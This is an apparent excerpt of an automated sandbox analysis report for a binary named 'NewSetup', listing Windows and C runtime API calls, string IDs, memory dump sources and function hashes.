                                                                                                      • GetLastError.KERNEL32(?,?,0022ACDE,00220760,0021B77F,BB40E64E,?,?,?,?,0023BFCA,000000FF), ref: 0022ACF5
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022AD03
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0022AD1C
                                                                                                      • SetLastError.KERNEL32(00000000,?,0022ACDE,00220760,0021B77F,BB40E64E,?,?,?,?,0023BFCA,000000FF), ref: 0022AD6E
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: a6b8d64a5d5d88429e74dc09b242e3c500ddac32d8403584f3f71a03a5172e0b
                                                                                                      • Instruction ID: cd2bbadc122df4013fdcc1c87199118a29cb737b0b0d74f0ac455bc5bed3e3d7
                                                                                                      • Opcode Fuzzy Hash: a6b8d64a5d5d88429e74dc09b242e3c500ddac32d8403584f3f71a03a5172e0b
                                                                                                      • Instruction Fuzzy Hash: 51012D36235B37FFE7251AF87C4D8262698E702B71720032BF61041DF0EF518C229941
                                                                                                      APIs
                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0022B68D
                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0022B906
                                                                                                      Similarity
                                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                                      • String ID: csm$csm$csm
                                                                                                      • API String ID: 2673424686-393685449
                                                                                                      • Opcode ID: 6064a26449d1c018bc89bdb46d399fcd8a62b95056958587cb0607561f75abf6
                                                                                                      • Instruction ID: 576066667541c776c60a9b8b351f643cc00d3caf5bf4745cd5c48d30d242a9fa
                                                                                                      • Opcode Fuzzy Hash: 6064a26449d1c018bc89bdb46d399fcd8a62b95056958587cb0607561f75abf6
                                                                                                      • Instruction Fuzzy Hash: 20B17B7182022AFBCF16DFE4E8819AEB7B9AF04310B14455AE8156B202D731D971DF92
                                                                                                      APIs
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021BF44
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021C028
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                      • String ID: MOC$RCC$csm
                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                      • Opcode ID: c4424507d8968f4bfca6f6335c7d69359f50be6a798a15c9bbc5695f8a7c303b
                                                                                                      • Instruction ID: ac025a7262330f99c5cd20c22ea96b7598506f8dc96bfe04ccea1c7869760ff2
                                                                                                      • Opcode Fuzzy Hash: c4424507d8968f4bfca6f6335c7d69359f50be6a798a15c9bbc5695f8a7c303b
                                                                                                      • Instruction Fuzzy Hash: EF41CD74910206DFCF2ADF68C9459EDB7F4BF68300F58805DE449A7A42C734AAA5CF52
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0023BE94,000000FF,?,00225685,?,?,00225721,00000000), ref: 002255F9
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0022560B
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,0023BE94,000000FF,?,00225685,?,?,00225721,00000000), ref: 0022562D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
                                                                                                      • Instruction ID: e48df7afeff1a3fe89048fa10e277669cfe8f50512d3b61ece97b5514aedd8d7
                                                                                                      • Opcode Fuzzy Hash: 96bf689e63735530a3363d4f4e482ffd35cde08b24cf453aa7c90595ab844530
                                                                                                      • Instruction Fuzzy Hash: 2701D675A10629BFCB118F94EC0DBBEB7BCFB06B15F004526F811E2690DBB49910CA90
                                                                                                      APIs
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0022D76F
                                                                                                      • __alloca_probe_16.LIBCMT ref: 0022D838
                                                                                                      • __freea.LIBCMT ref: 0022D89F
                                                                                                        • Part of subcall function 0022BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,0021A67D,00000018,?,00213D4A,00000018,00000000), ref: 0022BF43
                                                                                                      • __freea.LIBCMT ref: 0022D8B2
                                                                                                      • __freea.LIBCMT ref: 0022D8BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1096550386-0
                                                                                                      • Opcode ID: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
                                                                                                      • Instruction ID: f66d38fba59de9371627ce61650e4bd1dd66a616d4e01958824e5975b649c123
                                                                                                      • Opcode Fuzzy Hash: 3e05db668bd2dae0f90af092a00a4cf87d44b2b910a9fb40708bbb9e0f30d1d3
                                                                                                      • Instruction Fuzzy Hash: 1F519472620227BFEF219FE0AC81EBB77A9EF44710B150129FD04D6251E774DC729AA1
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0021F005
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00218E38), ref: 0021F024
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F052
                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0AD
                                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(00218E38,0021A2F0,?), ref: 0021F0C4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 66001078-0
                                                                                                      • Opcode ID: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
                                                                                                      • Instruction ID: ded5c8c19adc6dbb69184a5adb984cabf458e399fc10ada4332e8464ba347df2
                                                                                                      • Opcode Fuzzy Hash: be85b2aeffe1aebed0864cec17f74bfb285c0001cd5b7f587cdbe14fdc265e60
                                                                                                      • Instruction Fuzzy Hash: 09418C7592060ADFCB60CF24C6849EAB3F4FF29310B20493AE46A97546D770E9E5CF51
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021D4C9
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021D4D3
                                                                                                      • int.LIBCPMT ref: 0021D4EA
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0021C1F6
                                                                                                        • Part of subcall function 0021C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0021C210
                                                                                                      • codecvt.LIBCPMT ref: 0021D50D
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021D544
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                      • String ID:
                                                                                                      • API String ID: 3716348337-0
                                                                                                      • Opcode ID: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction ID: 2064acb6a62eb2eedff8fd5820831976e0aa0add34a34a94062527851a714108
                                                                                                      • Opcode Fuzzy Hash: 68a5fdfba31e12b7d34923b2641b581d04654afd0126ed54dddcd89ef5269bfc
                                                                                                      • Instruction Fuzzy Hash: 4E01C435921115DBCB06EB68D905AEE77F2AFA4324F740109E425AB292DF749EA0CF81
                                                                                                      APIs
                                                                                                      • __EH_prolog3.LIBCMT ref: 0021ADDE
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0021ADE9
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0021AE57
                                                                                                        • Part of subcall function 0021ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0021ACC2
                                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 0021AE04
                                                                                                      • _Yarn.LIBCPMT ref: 0021AE1A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                      • String ID:
                                                                                                      • API String ID: 1088826258-0
                                                                                                      • Opcode ID: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction ID: 5cd80c1a5c79fffd8f8034b7bb5249b234814f3e517d14be1b7414e4686a1489
                                                                                                      • Opcode Fuzzy Hash: dd8d5694f9b6d5decb0966c86b77927ba20338cc8f9ce7dd8885e54b96d3d470
                                                                                                      • Instruction Fuzzy Hash: CC01D8796221119BCB05EF24E9595BD77F5FF95750B14001AE40257382CF346E91CFC2
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen
                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                      • API String ID: 4218353326-1866435925
                                                                                                      • Opcode ID: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
                                                                                                      • Instruction ID: 532315da9c31262536a987e23da17491656ef861286c06dc28025179f88ff773
                                                                                                      • Opcode Fuzzy Hash: fc6270a5a89120943e2fd1d4b39c60fc8fcd4f07fff61e1309eef789314f832a
                                                                                                      • Instruction Fuzzy Hash: 6CF1CE75A102188FCB14CF68C494BADBBF2FF88324F198269E915AB391D774AD51CF90
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(00000000,?,0022E58D), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00228363), ref: 0022C210
                                                                                                      • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00230A35
                                                                                                      • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00225BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00230A6C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                       • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                       • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$CodePageValid
                                                                                                      • String ID: ,K$$utf8
                                                                                                      • API String ID: 943130320-825729930
                                                                                                      • Opcode ID: 95086bf6062d60f29b920adcdf7178d071e68359d5f480c563543ccbab005af4
                                                                                                      • Instruction ID: 8a82edb2ae76104c622ebc57056dfcf025515d16b99ec51f207f74413bc61f7f
                                                                                                      • Opcode Fuzzy Hash: 95086bf6062d60f29b920adcdf7178d071e68359d5f480c563543ccbab005af4
                                                                                                      • Instruction Fuzzy Hash: DD510BB1630306AAD724AF709CE1F7BB3A9EF05708F140425F64597181E6B0EDB08B75
                                                                                                      APIs
                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 00217526
                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00217561
                                                                                                        • Part of subcall function 0021AF37: CreateThreadpoolWork.KERNEL32(0021B060,00218A2A,00000000), ref: 0021AF46
                                                                                                        • Part of subcall function 0021AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0021AF53
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
                                                                                                      • String ID: Fail to schedule the chore!$G.$
                                                                                                      • API String ID: 3683891980-3836090748
                                                                                                      • Opcode ID: ce9bebe432bdb8545c951f2e0a37ed7b9ef6a2458dfe1c670cfc78f793adfbab
                                                                                                      • Instruction ID: 6e949584efe9c77130e3f4f3eac1f2fdc9c5fc37e94a8f9db5faf7a8870256a2
                                                                                                      • Opcode Fuzzy Hash: ce9bebe432bdb8545c951f2e0a37ed7b9ef6a2458dfe1c670cfc78f793adfbab
                                                                                                      • Instruction Fuzzy Hash: 7051ECB0921208DFCB00DF94E848BEEBBB5FF48320F144129E8196B391D776A965CF91
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00213EC6
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00214002
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021ABE5
                                                                                                        • Part of subcall function 0021ABC5: _Yarn.LIBCPMT ref: 0021AC09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LockitYarnstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: bad locale name$|=!e.$
                                                                                                      • API String ID: 2070049627-25103358
                                                                                                      • Opcode ID: 2a50f063bf1e470429d405b2f62cb2a61f5933456f34fc6a938963f106e02640
                                                                                                      • Instruction ID: ebf30bae878db9478cae3f061f85f193581c308e6c1268190f1e127cb4ff703d
                                                                                                      • Opcode Fuzzy Hash: 2a50f063bf1e470429d405b2f62cb2a61f5933456f34fc6a938963f106e02640
                                                                                                      • Instruction Fuzzy Hash: 7E41AFF0A10745ABEB10DF69D805B57BBF8BF14714F044229E40997B80E37AE568CBE1
                                                                                                      APIs
                                                                                                      • std::_Ref_count_base::_Decref.LIBCPMT ref: 0021B809
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DecrefRef_count_base::_std::_
                                                                                                      • String ID: MOC$RCC$csm
                                                                                                      • API String ID: 1456557076-2671469338
                                                                                                      • Opcode ID: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction ID: 660da78c084d33d138a3466321075fa54a4abce0f258bb6422d296b71977f096
                                                                                                      • Opcode Fuzzy Hash: 97cb14f7e322c5ff412a39b672bb247e8918c08b662ba075b34730e0e749c18a
                                                                                                      • Instruction Fuzzy Hash: FD21D6369202069FCF269F54D495AF9B7FCEF60720F15455EE401876D0D734ADE1CA80
                                                                                                      APIs
                                                                                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0021253A,?,?,00000000), ref: 0021F129
                                                                                                      • GetExitCodeThread.KERNEL32(?,00000000,?,?,0021253A,?,?,00000000), ref: 0021F142
                                                                                                      • CloseHandle.KERNEL32(?,?,?,0021253A,?,?,00000000), ref: 0021F154
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleObjectSingleThreadWait
                                                                                                      • String ID: :%!
                                                                                                      • API String ID: 2551024706-1915189741
                                                                                                      • Opcode ID: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction ID: e2d135945a100e18932bc2f42e89c46316e32a59ffc80aea00b2d6fb74fcefc6
                                                                                                      • Opcode Fuzzy Hash: e2ec18619b41e0e4d13945ec1a00c6d8454cf199c95c89b9aee516d45ff22709
                                                                                                      • Instruction Fuzzy Hash: B1F05E71654115FFDB108F24DD0DA9A3AA4EB12770F240720F835EA1E0E771DE908680
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarn
                                                                                                      • String ID: e.$$|=!e.$
                                                                                                      • API String ID: 1767336200-2625508016
                                                                                                      • Opcode ID: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction ID: 823995cb09c1e9c1722c51f467b18873b233a5def4e415e66f5dc0e170e1bc7e
                                                                                                      • Opcode Fuzzy Hash: 132bd353f5c1f9c1909503c862231be774a838f2f79cb6b85a8544dc48bb5763
                                                                                                      • Instruction Fuzzy Hash: A1E06D223283107FEB0CBA66EC52BBA73DCCB14B60F10002EF90A8A5C1ED10BD944A95
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C), ref: 0023694D
                                                                                                      • GetLastError.KERNEL32(?,002369DC,00000000,?,0024D2B0,?,?,?,00236913,00000004,InitializeCriticalSectionEx,00240D34,00240D3C,00000000,?,0022BBBC), ref: 00236957
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0023697F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.2321801857.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.2321751359.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321822129.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321875960.000000000024A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321889488.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321902818.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.2321971335.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                      • String ID: api-ms-
                                                                                                      • API String ID: 3177248105-2084034818
